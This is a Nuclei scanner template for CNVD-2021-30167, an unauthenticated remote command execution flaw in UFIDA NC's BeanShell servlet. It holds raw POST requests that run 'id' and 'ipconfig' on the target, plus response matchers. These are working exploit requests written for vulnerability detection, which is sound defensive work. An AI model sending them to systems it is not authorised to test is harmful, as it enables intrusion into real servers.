nuclei-templates/http/cnvd/2021/CNVD-2021-30167.yaml

53 lines
1.3 KiB
YAML

id: CNVD-2021-30167
info:
name: UFIDA NC BeanShell Remote Command Execution
author: pikpikcu
severity: critical
description: UFIDA NC BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
reference:
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491
- https://chowdera.com/2022/03/202203110138271510.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
tags: cnvd,cnvd2021,beanshell,rce,yonyou
metadata:
max-request: 2
http:
- raw:
- | #linux
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("id");
- | #windows
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("ipconfig");
matchers-condition: and
matchers:
- type: regex
regex:
- "uid="
- "Windows IP"
condition: or
- type: word
words:
- "BeanShell Test Servlet"
- type: status
status:
- 200